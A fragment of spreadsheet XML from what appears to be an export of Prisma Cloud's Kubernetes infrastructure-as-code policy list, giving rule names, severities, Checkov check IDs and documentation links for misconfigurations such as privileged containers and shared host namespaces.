          <t>{"category":"Kubernetes","resourceTypes":["Pod","Deployment","DaemonSet","StatefulSet","ReplicaSet","ReplicationController","Job","CronJob"]}</t>
        </is>
      </c>
      <c r="AA1125" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1125" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1125" t="inlineStr">
        <is>
          <t>CKV_K8S_40</t>
        </is>
      </c>
      <c r="AD1125" t="b">
        <v>1</v>
      </c>
      <c r="AE1125" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1125" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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5" t="inlineStr">
        <is>
          <t>1e4d1db0-70d8-4dad-ae2f-f9ce1b06b107</t>
        </is>
      </c>
      <c r="AI1125" t="inlineStr"/>
      <c r="AJ1125" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1125" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1126">
      <c r="A1126" t="inlineStr"/>
      <c r="B1126" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1126" s="2" t="inlineStr"/>
      <c r="D1126" t="inlineStr"/>
      <c r="E1126" t="inlineStr"/>
      <c r="F1126" t="inlineStr"/>
      <c r="G1126" t="b">
        <v>1</v>
      </c>
      <c r="H11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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1126" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="K1126" t="inlineStr">
        <is>
          <t>Containers share host process ID namespace</t>
        </is>
      </c>
      <c r="L1126" t="inlineStr"/>
      <c r="M1126" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1126" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1126" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1126" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1126" t="inlineStr"/>
      <c r="R1126" t="inlineStr"/>
      <c r="S1126" t="inlineStr"/>
      <c r="T1126" t="b">
        <v>0</v>
      </c>
      <c r="U1126" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1126" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="W1126" t="inlineStr">
        <is>
          <t>Containers should not share the host process ID namespace</t>
        </is>
      </c>
      <c r="X1126" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-16</t>
        </is>
      </c>
      <c r="Y1126" t="inlineStr"/>
      <c r="Z1126" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Pod","Deployment","DaemonSet","StatefulSet","ReplicaSet","ReplicationController","Job","CronJob"]}</t>
        </is>
      </c>
      <c r="AA1126" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1126" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1126" t="inlineStr">
        <is>
          <t>CKV_K8S_17</t>
        </is>
      </c>
      <c r="AD1126" t="b">
        <v>1</v>
      </c>
      <c r="AE1126" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1126" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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6" t="inlineStr">
        <is>
          <t>6d52c14b-7684-4f26-a5bf-fa7d7e1e0a04</t>
        </is>
      </c>
      <c r="AI1126" t="inlineStr"/>
      <c r="AJ1126" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1126" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1127">
      <c r="A1127" t="inlineStr"/>
      <c r="B1127" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1127" s="2" t="inlineStr"/>
      <c r="D1127" t="inlineStr"/>
      <c r="E1127" t="inlineStr"/>
      <c r="F1127" t="inlineStr"/>
      <c r="G1127" t="b">
        <v>1</v>
      </c>
      <c r="H11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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1127" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="K1127" t="inlineStr">
        <is>
          <t>Admission of root containers not minimized</t>
        </is>
      </c>
      <c r="L1127" t="inlineStr"/>
      <c r="M1127" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1127" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1127" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1127" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1127" t="inlineStr"/>
      <c r="R1127" t="inlineStr"/>
      <c r="S1127" t="inlineStr"/>
      <c r="T1127" t="b">
        <v>0</v>
      </c>
      <c r="U1127" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1127" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="W1127" t="inlineStr">
        <is>
          <t>Minimize the admission of root containers</t>
        </is>
      </c>
      <c r="X1127" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-22</t>
        </is>
      </c>
      <c r="Y1127" t="inlineStr"/>
      <c r="Z1127" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Pod","Deployment","DaemonSet","StatefulSet","ReplicaSet","ReplicationController","Job","CronJob"]}</t>
        </is>
      </c>
      <c r="AA1127" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1127" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1127" t="inlineStr">
        <is>
          <t>CKV_K8S_23</t>
        </is>
      </c>
      <c r="AD1127" t="b">
        <v>1</v>
      </c>
      <c r="AE1127" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1127" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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7" t="inlineStr">
        <is>
          <t>e343eb59-b487-4001-a3c0-f74187233802</t>
        </is>
      </c>
      <c r="AI1127" t="inlineStr"/>
      <c r="AJ1127" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1127" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1128">
      <c r="A1128" t="inlineStr"/>
      <c r="B1128" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1128" s="2" t="inlineStr"/>
      <c r="D1128" t="inlineStr"/>
      <c r="E1128" t="inlineStr"/>
      <c r="F1128" t="inlineStr"/>
      <c r="G1128" t="b">
        <v>1</v>
      </c>
      <c r="H11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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1128" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="K1128" t="inlineStr">
        <is>
          <t>Containers wishing to share host IPC namespace admitted</t>
        </is>
      </c>
      <c r="L1128" t="inlineStr"/>
      <c r="M1128" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1128" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1128" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1128" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1128" t="inlineStr"/>
      <c r="R1128" t="inlineStr"/>
      <c r="S1128" t="inlineStr"/>
      <c r="T1128" t="b">
        <v>0</v>
      </c>
      <c r="U1128" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1128" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="W1128" t="inlineStr">
        <is>
          <t>Do not admit containers wishing to share the host IPC namespace</t>
        </is>
      </c>
      <c r="X1128" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-3</t>
        </is>
      </c>
      <c r="Y1128" t="inlineStr"/>
      <c r="Z1128" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["PodSecurityPolicy"]}</t>
        </is>
      </c>
      <c r="AA1128" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1128" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1128" t="inlineStr">
        <is>
          <t>CKV_K8S_3</t>
        </is>
      </c>
      <c r="AD1128" t="b">
        <v>1</v>
      </c>
      <c r="AE1128" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1128" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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8" t="inlineStr">
        <is>
          <t>02c6acab-8581-41b5-922c-91ba79eb0f01</t>
        </is>
      </c>
      <c r="AI1128" t="inlineStr"/>
      <c r="AJ1128" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1128" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1129">
      <c r="A1129" t="inlineStr"/>
      <c r="B1129" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1129" s="2" t="inlineStr"/>
      <c r="D1129" t="inlineStr"/>
      <c r="E1129" t="inlineStr"/>
      <c r="F1129" t="inlineStr"/>
      <c r="G1129" t="b">
        <v>1</v>
      </c>
      <c r="H11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29" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1129" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="K1129" t="inlineStr">
        <is>
          <t>seccomp profile is not set to Docker/Default or Runtime/Default</t>
        </is>
      </c>
      <c r="L1129" t="inlineStr"/>
      <c r="M1129" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1129" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1129" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1129" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1129" t="inlineStr"/>
      <c r="R1129" t="inlineStr"/>
      <c r="S1129" t="inlineStr"/>
      <c r="T1129" t="b">
        <v>0</v>
      </c>
      <c r="U1129" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1129" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="W1129" t="inlineStr">
        <is>
          <t>Ensure default seccomp profile set to docker/default or runtime/default</t>
        </is>
      </c>
      <c r="X1129" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-30</t>
        </is>
      </c>
      <c r="Y1129" t="inlineStr"/>
      <c r="Z1129" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["PodSecurityPolicy"]}</t>
        </is>
      </c>
      <c r="AA1129" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1129" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1129" t="inlineStr">
        <is>
          <t>CKV_K8S_32</t>
        </is>
      </c>
      <c r="AD1129" t="b">
        <v>1</v>
      </c>
      <c r="AE1129" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1129" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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29" t="inlineStr">
        <is>
          <t>36e37c7d-0a14-4dd9-b96e-f5bfba199223</t>
        </is>
      </c>
      <c r="AI1129" t="inlineStr"/>
      <c r="AJ1129" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1129" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1130">
      <c r="A1130" t="inlineStr"/>
      <c r="B1130" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1130" s="2" t="inlineStr"/>
      <c r="D1130" t="inlineStr"/>
      <c r="E1130" t="inlineStr"/>
      <c r="F1130" t="inlineStr"/>
      <c r="G1130" t="b">
        <v>1</v>
      </c>
      <c r="H11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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1130" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="K1130" t="inlineStr">
        <is>
          <t>Containers with added capability are allowed</t>
        </is>
      </c>
      <c r="L1130" t="inlineStr"/>
      <c r="M1130" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1130" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1130" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1130" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1130" t="inlineStr"/>
      <c r="R1130" t="inlineStr"/>
      <c r="S1130" t="inlineStr"/>
      <c r="T1130" t="b">
        <v>0</v>
      </c>
      <c r="U1130" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1130" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="W1130" t="inlineStr">
        <is>
          <t>Do not allow containers with added capability</t>
        </is>
      </c>
      <c r="X1130" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-23</t>
        </is>
      </c>
      <c r="Y1130" t="inlineStr"/>
      <c r="Z1130" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["PodSecurityPolicy"]}</t>
        </is>
      </c>
      <c r="AA1130" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1130" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1130" t="inlineStr">
        <is>
          <t>CKV_K8S_24</t>
        </is>
      </c>
      <c r="AD1130" t="b">
        <v>1</v>
      </c>
      <c r="AE1130" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1130" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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0" t="inlineStr">
        <is>
          <t>54f07020-c973-43a4-9ac4-fce8b8f342f6</t>
        </is>
      </c>
      <c r="AI1130" t="inlineStr"/>
      <c r="AJ1130" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1130" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1131">
      <c r="A1131" t="inlineStr"/>
      <c r="B1131" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1131" s="2" t="inlineStr"/>
      <c r="D1131" t="inlineStr"/>
      <c r="E1131" t="inlineStr"/>
      <c r="F1131" t="inlineStr"/>
      <c r="G1131" t="b">
        <v>1</v>
      </c>
      <c r="H11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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1131" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="K1131" t="inlineStr">
        <is>
          <t>Containers run with AllowPrivilegeEscalation based on Pod Security Policy setting</t>
        </is>
      </c>
      <c r="L1131" t="inlineStr"/>
      <c r="M1131" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1131" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1131" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1131" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1131" t="inlineStr"/>
      <c r="R1131" t="inlineStr"/>
      <c r="S1131" t="inlineStr"/>
      <c r="T1131" t="b">
        <v>0</v>
      </c>
      <c r="U1131" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1131" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="W1131" t="inlineStr">
        <is>
          <t>Containers should not run with allowPrivilegeEscalation</t>
        </is>
      </c>
      <c r="X1131" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-containers-do-not-run-with-allowprivilegeescalation</t>
        </is>
      </c>
      <c r="Y1131" t="inlineStr"/>
      <c r="Z1131" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["PodSecurityPolicy"]}</t>
        </is>
      </c>
      <c r="AA1131" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1131" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1131" t="inlineStr">
        <is>
          <t>CKV_K8S_5</t>
        </is>
      </c>
      <c r="AD1131" t="b">
        <v>1</v>
      </c>
      <c r="AE1131" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1131" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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1" t="inlineStr">
        <is>
          <t>59392ccc-c1a5-4a18-bd29-3513b263535d</t>
        </is>
      </c>
      <c r="AI1131" t="inlineStr"/>
      <c r="AJ1131" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1131" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1132">
      <c r="A1132" t="inlineStr"/>
      <c r="B1132" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1132" s="2" t="inlineStr"/>
      <c r="D1132" t="inlineStr"/>
      <c r="E1132" t="inlineStr"/>
      <c r="F1132" t="inlineStr"/>
      <c r="G1132" t="b">
        <v>1</v>
      </c>
      <c r="H11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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1132" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="K1132" t="inlineStr">
        <is>
          <t>Containers with NET_RAW capability admitted</t>
        </is>
      </c>
      <c r="L1132" t="inlineStr"/>
      <c r="M1132" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1132" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1132" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1132" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1132" t="inlineStr"/>
      <c r="R1132" t="inlineStr"/>
      <c r="S1132" t="inlineStr"/>
      <c r="T1132" t="b">
        <v>0</v>
      </c>
      <c r="U1132" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1132" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="W1132" t="inlineStr">
        <is>
          <t>Do not admit containers with the NET_RAW capability</t>
        </is>
      </c>
      <c r="X1132" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-6</t>
        </is>
      </c>
      <c r="Y1132" t="inlineStr"/>
      <c r="Z1132" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["PodSecurityPolicy"]}</t>
        </is>
      </c>
      <c r="AA1132" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1132" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1132" t="inlineStr">
        <is>
          <t>CKV_K8S_7</t>
        </is>
      </c>
      <c r="AD1132" t="b">
        <v>1</v>
      </c>
      <c r="AE1132" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1132" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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2" t="inlineStr">
        <is>
          <t>11c377f1-a61c-4f70-be29-b09b6bf3c12e</t>
        </is>
      </c>
      <c r="AI1132" t="inlineStr"/>
      <c r="AJ1132" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1132" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1133">
      <c r="A1133" t="inlineStr"/>
      <c r="B1133" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1133" s="2" t="inlineStr"/>
      <c r="D1133" t="inlineStr"/>
      <c r="E1133" t="inlineStr"/>
      <c r="F1133" t="inlineStr"/>
      <c r="G1133" t="b">
        <v>1</v>
      </c>
      <c r="H11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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1133" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="K1133" t="inlineStr">
        <is>
          <t>Containers wishing to share host network namespace admitted</t>
        </is>
      </c>
      <c r="L1133" t="inlineStr"/>
      <c r="M1133" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1133" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1133" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1133" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1133" t="inlineStr"/>
      <c r="R1133" t="inlineStr"/>
      <c r="S1133" t="inlineStr"/>
      <c r="T1133" t="b">
        <v>0</v>
      </c>
      <c r="U1133" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1133" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="W1133" t="inlineStr">
        <is>
          <t>Do not admit containers wishing to share the host network namespace</t>
        </is>
      </c>
      <c r="X1133" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-4</t>
        </is>
      </c>
      <c r="Y1133" t="inlineStr"/>
      <c r="Z1133" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["PodSecurityPolicy"]}</t>
        </is>
      </c>
      <c r="AA1133" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1133" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1133" t="inlineStr">
        <is>
          <t>CKV_K8S_4</t>
        </is>
      </c>
      <c r="AD1133" t="b">
        <v>1</v>
      </c>
      <c r="AE1133" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1133" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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3" t="inlineStr">
        <is>
          <t>c6547e88-c701-4283-bb52-c415ff0340bd</t>
        </is>
      </c>
      <c r="AI1133" t="inlineStr"/>
      <c r="AJ1133" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1133" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1134">
      <c r="A1134" t="inlineStr"/>
      <c r="B1134" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1134" s="2" t="inlineStr"/>
      <c r="D1134" t="inlineStr"/>
      <c r="E1134" t="inlineStr"/>
      <c r="F1134" t="inlineStr"/>
      <c r="G1134" t="b">
        <v>1</v>
      </c>
      <c r="H11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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1134" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="K1134" t="inlineStr">
        <is>
          <t>Admission of containers with capabilities assigned is not minimised</t>
        </is>
      </c>
      <c r="L1134" t="inlineStr"/>
      <c r="M1134" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1134" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1134" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1134" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1134" t="inlineStr"/>
      <c r="R1134" t="inlineStr"/>
      <c r="S1134" t="inlineStr"/>
      <c r="T1134" t="b">
        <v>0</v>
      </c>
      <c r="U1134" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1134" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="W1134" t="inlineStr">
        <is>
          <t>Minimize the admission of containers with capabilities assigned</t>
        </is>
      </c>
      <c r="X1134" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/minimize-the-admission-of-containers-with-capabilities-assigned</t>
        </is>
      </c>
      <c r="Y1134" t="inlineStr"/>
      <c r="Z1134" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["PodSecurityPolicy"]}</t>
        </is>
      </c>
      <c r="AA1134" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1134" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1134" t="inlineStr">
        <is>
          <t>CKV_K8S_36</t>
        </is>
      </c>
      <c r="AD1134" t="b">
        <v>1</v>
      </c>
      <c r="AE1134" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1134" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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4" t="inlineStr">
        <is>
          <t>b1c9494c-3caa-497e-950f-4692e5d9fa79</t>
        </is>
      </c>
      <c r="AI1134" t="inlineStr"/>
      <c r="AJ1134" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1134" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1135">
      <c r="A1135" t="inlineStr"/>
      <c r="B1135" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1135" s="2" t="inlineStr"/>
      <c r="D1135" t="inlineStr"/>
      <c r="E1135" t="inlineStr"/>
      <c r="F1135" t="inlineStr"/>
      <c r="G1135" t="b">
        <v>1</v>
      </c>
      <c r="H11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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1135" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="K1135" t="inlineStr">
        <is>
          <t>Privileged containers are admitted</t>
        </is>
      </c>
      <c r="L1135" t="inlineStr"/>
      <c r="M1135" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1135" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1135" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1135" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1135" t="inlineStr"/>
      <c r="R1135" t="inlineStr"/>
      <c r="S1135" t="inlineStr"/>
      <c r="T1135" t="b">
        <v>0</v>
      </c>
      <c r="U1135" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1135" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="W1135" t="inlineStr">
        <is>
          <t>Do not admit privileged containers</t>
        </is>
      </c>
      <c r="X1135" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
